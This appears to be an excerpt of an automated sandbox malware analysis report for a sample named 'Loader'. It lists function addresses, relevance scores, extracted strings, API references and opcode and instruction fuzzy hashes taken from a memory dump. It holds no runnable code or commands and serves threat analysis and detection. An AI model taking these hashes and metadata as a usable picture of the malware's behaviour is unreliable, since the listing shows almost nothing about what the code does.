Opcode Fuzzy Hash: 1a636787e15b6dfbffc777b98caeaa58adb1bad3d2e6ff711b04f599927b9df5
Instruction Fuzzy Hash: AA419C749102689FEF10CFA8A895BDEBFB5FB42304F61422DE915BB282D7305806CB95

Function 0043DEC0 Relevance: 3.1, Strings: 2, Instructions: 599COMMON

Download Yara Rule

Strings

.>, xrefs: 0043DEEE
RC, xrefs: 0043E646

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: .>$RC
API String ID: 0-739570707
Opcode ID: 8dac014fd9d88024ae43f355d033b8fd659b9da0999b59c2f11948acf9a83e36
Instruction ID: a9902c64a6cfc45d1455ef59315f04145ba005826457c5f7f8924b4738a1d797
Opcode Fuzzy Hash: 8dac014fd9d88024ae43f355d033b8fd659b9da0999b59c2f11948acf9a83e36
Instruction Fuzzy Hash: 0F12003A608261CFD704CF69E89062BB7E2EBCE311F0A89BDD58887352D634DC45DB45

Function 00424DD0 Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

KJIH, xrefs: 00424F2D
KJIH, xrefs: 00424E1E

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: KJIH$KJIH
API String ID: 2994545307-1827572986
Opcode ID: 5901b9c9801437ca6da1e1bc95f8392794ef0c03be606285b9c1f4b32955998d
Instruction ID: 3fd2a51386bd38244c82c33b2d410de7c36aa468ed45cb75ba0ce9b550d5e39c
Opcode Fuzzy Hash: 5901b9c9801437ca6da1e1bc95f8392794ef0c03be606285b9c1f4b32955998d
Instruction Fuzzy Hash: 8E9113B8A09314DFD304DF24E89166B77A1FBDA305F96483DE48287252D7389906CB5F

Function 0043E010 Relevance: 1.8, Strings: 1, Instructions: 502COMMON

Download Yara Rule

Strings

RC, xrefs: 0043E646

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: RC
API String ID: 0-2052145962
Opcode ID: eaa9e5013958e1e58c4ef7d442ec53acd66b901e1c21d984c1301b7d455dd4a6
Instruction ID: 188d59449aa71c54b0dd6d55903c93429df92ca099489ec84c81c7faccd89538
Opcode Fuzzy Hash: eaa9e5013958e1e58c4ef7d442ec53acd66b901e1c21d984c1301b7d455dd4a6
Instruction Fuzzy Hash: F6F1F23A608261CFD704CF29D89066BB7E2EBCE315F0A89BDD88987352D634DC45DB84

Function 0043E0D0 Relevance: 1.7, Strings: 1, Instructions: 459COMMON

Download Yara Rule

Strings

RC, xrefs: 0043E646

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: RC
API String ID: 0-2052145962
Opcode ID: be9982a96f6003c29145d46537963d060124fa44baad1eaeff07975e1c03206d
Instruction ID: 24a6c064fd117c3e02e04e430fcfa4dad7956b8eb8a585ad1a92957b63ef26be
Opcode Fuzzy Hash: be9982a96f6003c29145d46537963d060124fa44baad1eaeff07975e1c03206d
Instruction Fuzzy Hash: 12E1E236608261CFD708CF29D89166BB7E2EBCE301F0A89BDD88987356D634DC45DB85

Function 0043E160 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

RC, xrefs: 0043E646

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: RC
API String ID: 0-2052145962
Opcode ID: b6a75dfe833e2229e65178c9ca1fb15727d8664f0b5e76c402b8a1fe40f341b1
Instruction ID: ab2a1d9537d956290d8e2ae9b2c7fc899c7dd772ecb5a654228f72f34c74fc1d
Opcode Fuzzy Hash: b6a75dfe833e2229e65178c9ca1fb15727d8664f0b5e76c402b8a1fe40f341b1
Instruction Fuzzy Hash: 26D104356082618FD708CF29D89166BBBE2EBCE300F0A89BDD8C987352D635DC45CB85

Function 00429690 Relevance: 1.7, Strings: 1, Instructions: 416COMMON

Download Yara Rule

Strings

", xrefs: 00429996

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: f50701cb7387290be5b77d209286991e0be769b517a411cc81d387e172c523ad
Instruction ID: 0eaeaa1ef173875a006067207e7b5c011d7810b1169704ed49223c6ff45e0f17
Opcode Fuzzy Hash: f50701cb7387290be5b77d209286991e0be769b517a411cc81d387e172c523ad
Instruction Fuzzy Hash: BDD146B2B083219FD714DE24E85176BB7D5AF84314F48892FE89987381E738EC45C78A

Function 00424D50 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

KJIH, xrefs: 00424F2D

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KJIH
API String ID: 0-1239430616
Opcode ID: 171359fecd5211568442c695c83101434cb5e552b331806795a594ed28362a9b
Instruction ID: 0314d729e1bd4c8a4f402b591968989632aed2d55f3d507ba63187338832275f
Opcode Fuzzy Hash: 171359fecd5211568442c695c83101434cb5e552b331806795a594ed28362a9b
Instruction Fuzzy Hash: 0C8122B8A09304DFE304DF24EC8162B77A1FBDA304F56483EE48197261D7389816CB5B

Function 00429B50 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 00429D4E

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 740f0eab0e3446e46d754a29a0c893ff3538b6eed32640b7ed83bb07cb142a0e
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 25711532B083255BD714CE29E48031FBBE2ABC5710FA9852FE4949B391D739EC45D78A

Function 0043F700 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

@, xrefs: 0043F7AE

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: de25b8306d0966e9a7cb574966eb00218c7bc550a7dae95f40679f6c08373d4c
Instruction ID: c01d0ac4c5e1d30fdbb4685948f685f70b8d59acb6522e17a761f546efcd269d
Opcode Fuzzy Hash: de25b8306d0966e9a7cb574966eb00218c7bc550a7dae95f40679f6c08373d4c
Instruction Fuzzy Hash: 38416676E053009BD7188F14CC02B2BB7E2FFD8314F09992DE5895B3A0E7759808C78A

Function 0043E4C0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

RC, xrefs: 0043E646

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: RC
API String ID: 0-2052145962
Opcode ID: c7922054ee7a4c4f3529f22edb1d008cab52ee608b0a4ac1419adc4944d70704
Instruction ID: dc912fae45d474757f51ad8b4dc45c00f2730fde0556c5e3657e1f5aa16ecb4d
Opcode Fuzzy Hash: c7922054ee7a4c4f3529f22edb1d008cab52ee608b0a4ac1419adc4944d70704
Instruction Fuzzy Hash: 2D51243910D2A1DBC7048F25E8A0667BBE3AB8B705F4DC5FDC4C847396E6358815DB54

Function 0042878C Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

KJIH, xrefs: 004287E2

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KJIH
API String ID: 0-1239430616
Opcode ID: bb652a2b732e93a9a2e60da3115c40c45187687863db7593936ec55d89b7611d
Instruction ID: 82c0f1ec7d6a73cf931a5d30ce39ba8c57cc9c24421601cf5fddb82c06c88540
Opcode Fuzzy Hash: bb652a2b732e93a9a2e60da3115c40c45187687863db7593936ec55d89b7611d
Instruction Fuzzy Hash: 1A217C74B073208BD3188B54E98153F7393BFDA718FA6462FD58227746C6286C02879E

Function 0040D864 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

;:98, xrefs: 0040D8B3

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:98
API String ID: 2994545307-152368606
Opcode ID: dab9f2827aba08b165c7aac0e486990032caa56db21b6122b5188f9f5ad13fb1
Instruction ID: 85e6f7f2ad5f6ed6be70f96b5fb30400411e09ba8578afe73efd15eb801782cb
Opcode Fuzzy Hash: dab9f2827aba08b165c7aac0e486990032caa56db21b6122b5188f9f5ad13fb1
Instruction Fuzzy Hash: 82112579E453428BE328DB54D851BBBB3A3E7C6300F49C43DD485E3285DB389C069749

Function 004074E0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb93d84dcfc19be5caa5e094c4005043853c56ff4e222b72d0d4c462703aa76a
Instruction ID: a1299e9bb5d21da042c7c98357e958a0d15b1e79b33078520b9fadae00b39269
Opcode Fuzzy Hash: eb93d84dcfc19be5caa5e094c4005043853c56ff4e222b72d0d4c462703aa76a
Instruction Fuzzy Hash: 1522A032A0C7118BD725DE18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47

Function 00438BF8 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cbb3835a17f4906e733f8d8a601b35127e782b0f4d8a2526924d9d09b22cbec
Instruction ID: ce0549cd3e898189bc2f519ef3ffc9b5f1a0a0932b43f7bde13a8c16fd854004
Opcode Fuzzy Hash: 4cbb3835a17f4906e733f8d8a601b35127e782b0f4d8a2526924d9d09b22cbec
Instruction Fuzzy Hash: 37D1E43F629212CBC7189F38D86116EB3E2FF8A795F0A857DD481572A0EB3988508755

Function 00405980 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e30762cd198d07baf172038ea6e678641816a83bca1c3dbf879ffd016bfde3
Instruction ID: 9e4d4f321f2ab9fee31fadf70e7d3c99dcaffe26a7035ebad20387f70980d1ea
Opcode Fuzzy Hash: 29e30762cd198d07baf172038ea6e678641816a83bca1c3dbf879ffd016bfde3
Instruction Fuzzy Hash: E9F1CD356087418FD724CF29C88062BFBE6EFD9300F08882EE5D597391E639E945CB96

Function 0042BE79 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8faad6a29270cdedf86b6e9b69f39c533fc13f9793eded9b955dd3c87ef0b42
Instruction ID: adc0e7a3bb8e1d948c8060b51b56e6b90c9ecb5cc601dfc554054ddd671d30dc
Opcode Fuzzy Hash: d8faad6a29270cdedf86b6e9b69f39c533fc13f9793eded9b955dd3c87ef0b42
Instruction Fuzzy Hash: D1516822754B418BC7298E75D9D0277BFE3AFA3304B5CDAADC0D247786C678A40A8B54

Function 0042A4AB Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e84d0e4399bea411451f2211db7bad7f4c3a4ba9edb2c31e77a4adb7008287d
Instruction ID: 7ab2f63fb84900acdd1656d73215f2142beefe0aa729eb43cc87bb6b1277d5f5
Opcode Fuzzy Hash: 4e84d0e4399bea411451f2211db7bad7f4c3a4ba9edb2c31e77a4adb7008287d
Instruction Fuzzy Hash: C4513431210B818BD729CF36C8903F7BBD29F92210F0C886EC4D797392D63CA84A8725

Function 0042A454 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab6b139baaac9e4e5d8178fd3fa3324eed87b8efa9120a8cc97db6c44517ebf
Instruction ID: 1a1032abd0865255696ec9c6f60ab36adff7f027e707a3b562032f5702beb69f
Opcode Fuzzy Hash: fab6b139baaac9e4e5d8178fd3fa3324eed87b8efa9120a8cc97db6c44517ebf
Instruction Fuzzy Hash: 3E512435214B408BD729CF31C4507B3BBE2AF92310F48886EC8D797756DB38A446C725

Function 0042C017 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d0444338c68c94f28b2acb6eb60e962d4fc9d78141168b8e62b7e7dd2dd943
Instruction ID: c6a06d5f47a09792a17c42cfadbf8418dcd07b9b28c5b5067b6b291b7be5bac0
Opcode Fuzzy Hash: 08d0444338c68c94f28b2acb6eb60e962d4fc9d78141168b8e62b7e7dd2dd943
Instruction Fuzzy Hash: DF516621705B418BC7258F39D9D03A7BFE39FA3204B5CDA9DC0D247B86C678A40B8B64

Function 004029E0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
Instruction ID: e2272b09530fdfe434b0d143e6e3f29adb35b8dd9d30c8e57c0df37557f4ded1
Opcode Fuzzy Hash: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
Instruction Fuzzy Hash: 10412A32B0827147CB188E2D8DA417BBAD39FC5205B0EC67AFCC9AB7D6D578990097D4

Function 0042C2C5 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9c329e33e66690599fb787d261bd83ab39580b0a6d37eaf8bbef8854206921
Instruction ID: 20838f8c1eea955b373fb87a281ba7edf50170cdb8867ca150640271efdbbc58
Opcode Fuzzy Hash: 8e9c329e33e66690599fb787d261bd83ab39580b0a6d37eaf8bbef8854206921
Instruction Fuzzy Hash: 48416622745B418AC7258F39D9C13A7BFE39FA6204B5CDA9DC0D247B8AC678940B8B54

Function 0043B490 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a812e7afcab0055418b5feebe48c17b33cb9248494f446b18543dda8bf1526a2
Instruction ID: b940f5766d675bc1515b45e8cb95eed982f6fe41c5deace55164cc72049bce6f
Opcode Fuzzy Hash: a812e7afcab0055418b5feebe48c17b33cb9248494f446b18543dda8bf1526a2
Instruction Fuzzy Hash: 702146356043089FD7009F54D882B7FB7AAE7CD718F14E53EEA8652360D7358C02979A

Function 0042B2D3 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fb1f17ecc1b6475e96e4784a1cf3f539a3c4a72a17ab530f4db46c33cd6eae
Instruction ID: f1bbdd047a02e9e5c7edfc0c4259d1cfada5564dce6764716a5cab6588d50513
Opcode Fuzzy Hash: 02fb1f17ecc1b6475e96e4784a1cf3f539a3c4a72a17ab530f4db46c33cd6eae
Instruction Fuzzy Hash: D711E9646046938ADB118F369850373FFE1AFA3310F1CA59AD0D69B282D734C9428B59

Function 00434070 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 326f267f6e389890a46e85a813888d01e9b7a3303669f60e583d2f75ef0d29fd
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 9B11EC337051D44EC31A8D3C85005A67FF30AD7234F19939AF5B49B2D2D5279D8B8369

Function 00429380 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be56e125ef8fdcd7b5aad0738f0f3c645e8bdf1225c287f9b8ea65b2d99b0bb
Instruction ID: 87ed21734994cec42363ea500dd018485c50acf6b9c8d804ad7c93d8f6aeac9f
Opcode Fuzzy Hash: 8be56e125ef8fdcd7b5aad0738f0f3c645e8bdf1225c287f9b8ea65b2d99b0bb
Instruction Fuzzy Hash: 0501D8F1B0071157D720DE11E4C0B2BB2A86F89708F09453EEC4957382DB7DEC09C299

Function 0042B5BA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 785b39fcc9392fd8b71be73e1dc1e3a09604ef963da59a36aea491e73c3e0edd
Instruction ID: 76562f9a61f1b6c1c6b4a7ab71ee71120a88f630fed9c3b084894c0c6488cdb0
Opcode Fuzzy Hash: 785b39fcc9392fd8b71be73e1dc1e3a09604ef963da59a36aea491e73c3e0edd
Instruction Fuzzy Hash: 7F1108646146528ADB118F369C51273FFB2AF97310F1CE699D0969B392D734C8418B48

Function 0042CB27 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2444f6f41263fc9a97bc3a1e6faf490d7ee49476af38e0cea358b5169c090539
Instruction ID: bc08c9d27010f6511f84465c6cbe6ee7dff3e1f556fc70955d01d00546b88296
Opcode Fuzzy Hash: 2444f6f41263fc9a97bc3a1e6faf490d7ee49476af38e0cea358b5169c090539
Instruction Fuzzy Hash: C7E0862850C6828AC7158B29A5B0776FFA04B27245F5810AFC9D2A7382C735D806C768

Function 0043D189 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac11a5084322e0e50038f3972ea835d5dbdd041ea50d3f791bc5976108fff5a
Instruction ID: 90dbf2188b88090532954ceb512ab571cc4c7e5e2bc879964961be4f991ac2d8
Opcode Fuzzy Hash: 8ac11a5084322e0e50038f3972ea835d5dbdd041ea50d3f791bc5976108fff5a
Instruction Fuzzy Hash: 58C092BCE481808F864CCF24D861879F3B0D713206B00312EF45373AA2D920E4019A0D

Function 00420573 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a41649df7de0182e420f360dc0e43a1c83710391c9b8b0ed4877af76609a86
Instruction ID: f0d1ac1899a3a52ad3df2ef200d9ce619c7cbc2c8289e8ec8468606478705e50
Opcode Fuzzy Hash: 12a41649df7de0182e420f360dc0e43a1c83710391c9b8b0ed4877af76609a86
Instruction Fuzzy Hash: 4DB092E9C02C10A7D4112B113E029AAB0240D1330CF05213AE84632243AA2AD21E409F

Function 004308E4 Relevance: 50.9, APIs: 1, Strings: 28, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00430954

Strings

0, xrefs: 00430ABD
6, xrefs: 00430A25
0, xrefs: 00430A15
., xrefs: 00430AFD
$, xrefs: 004309B5
4, xrefs: 00430A7D
1, xrefs: 00430AAD
;, xrefs: 00430A5D
&, xrefs: 004309A5
,, xrefs: 00430975
,, xrefs: 00430ACD
2, xrefs: 00430A05
!, xrefs: 00430B3D
0, xrefs: 00430B2D
), xrefs: 00430A8D
<, xrefs: 004309F5
>, xrefs: 004309E5
7, xrefs: 00430B0D
", xrefs: 00430985
0, xrefs: 00430BE0
8, xrefs: 004309D5
4, xrefs: 00430A35
, xrefs: 00430995
:, xrefs: 004309C5
), xrefs: 00430AED
$, xrefs: 00430B1D
;, xrefs: 00430A6D
8, xrefs: 00430A9D

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: $!$"$$$$$&$)$)$,$,$.$0$0$0$0$1$2$4$4$6$7$8$8$:$;$;$<$>
API String ID: 2525500382-3371045870
Opcode ID: 1840f16f3ed7a273a269ff92a96c2fada54146b50e64e1e0a7b3502e77a3b2fb
Instruction ID: 6906b77f927c0c7e426c2cc27663f2fd6647fa507eada89dfc8a2594fda36f35
Opcode Fuzzy Hash: 1840f16f3ed7a273a269ff92a96c2fada54146b50e64e1e0a7b3502e77a3b2fb
Instruction Fuzzy Hash: 8D81D32020D7D18AE332C73C885879BBED16BA7224F484B9ED1E99B2D2D7B50506C767

Function 00430697 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004306DD

Strings

f, xrefs: 00430757
d, xrefs: 00430761
j, xrefs: 0043076B
&, xrefs: 00430734
O, xrefs: 0043073E
8, xrefs: 00430702
e, xrefs: 00430766
8, xrefs: 0043072A
7, xrefs: 004306F8
, xrefs: 0043070C
b, xrefs: 00430743
`, xrefs: 0043074D
%, xrefs: 00430716
7, xrefs: 00430720

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitVariant
String ID: $%$&$7$7$8$8$O$`$b$d$e$f$j
API String ID: 1927566239-1465853573
Opcode ID: c3dd1d8f25f4f9f6eb8a58d67c4bf423468c3cbcab7a7dddca57f637f2b7efce
